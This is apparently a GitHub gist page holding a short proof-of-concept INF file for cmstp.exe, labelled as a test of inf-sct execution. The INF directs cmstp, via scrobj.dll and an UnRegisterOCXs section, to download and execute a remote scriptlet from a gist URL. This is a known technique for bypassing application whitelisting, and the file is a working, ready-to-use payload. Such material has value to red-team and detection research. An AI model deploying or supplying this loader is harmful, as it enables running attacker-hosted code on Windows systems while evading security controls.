-
-
Save carnal0wnage/64418c67531055991d89beecd3f65d87 to your computer and use it in GitHub Desktop.
Test inf-sct execution (+++ @NickTyrer - https://gist.github.com/NickTyrer/)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
;cmstp.exe /s cmstp.inf | |
[version] | |
Signature=$chicago$ | |
AdvancedINF=2.5 | |
[DefaultInstall_SingleUser] | |
UnRegisterOCXs=UnRegisterOCXSection | |
[UnRegisterOCXSection] | |
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct | |
[Strings] | |
AppAct = "SOFTWARE\Microsoft\Connection Manager" | |
ServiceName="Yay" | |
ShortSvcName="Yay" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment